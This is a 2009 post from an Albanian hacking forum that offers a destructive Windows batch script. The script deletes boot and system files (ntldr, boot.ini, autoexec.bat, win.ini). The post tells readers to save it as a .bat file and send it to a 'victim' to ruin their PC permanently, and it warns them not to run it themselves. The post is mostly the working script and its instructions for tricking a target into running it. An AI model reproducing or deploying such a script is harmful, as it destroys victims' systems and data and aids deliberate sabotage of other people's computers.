Ahg Security Albanian Hackers Group & Al-hosting.com
Welocme---------Mirese Erdhet

ahg-security

Mirse erdhet ne forumin tone,shpresoj tia kaloni sa me mire
,,Ju lutem regjistrohuni....
Ne kete forum do tia kaloni shume mire dhe shpresojme tju pelqeje sa me shume
ne jemi munduar qe tju krijojme kushte qe te ndiheni sa me mire ne kete forum


Fik pc pergjithmon

Shko poshtë

Fik pc pergjithmon

Mesazh  jurg3n prej Fri Aug 21, 2009 1:19 pm

Fik pc pergjithmon


Cito:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Hapeni notepad dhe bëjeni copy past codin që është i postuar më lart dhe ruajeni si fajll .bat dhe ja dergoni fiktimes të cilen dëshironi më ja prish pc-n përgjithmon.

PERKUJTOJ
Mos klikoni ju mbi atë fajll se ju shkon Pc-ja

Gjithashtu nëse viktima ka VISTA atëhërë ky trik nuk funksionon.

_________________
HaCkED by 4saken
avatar
jurg3n
Admin
Admin

Numri i postimeve : 776
Join date : 14/08/2009

Shiko profilin e anëtarit

Mbrapsht në krye Shko poshtë

Mbrapsht në krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi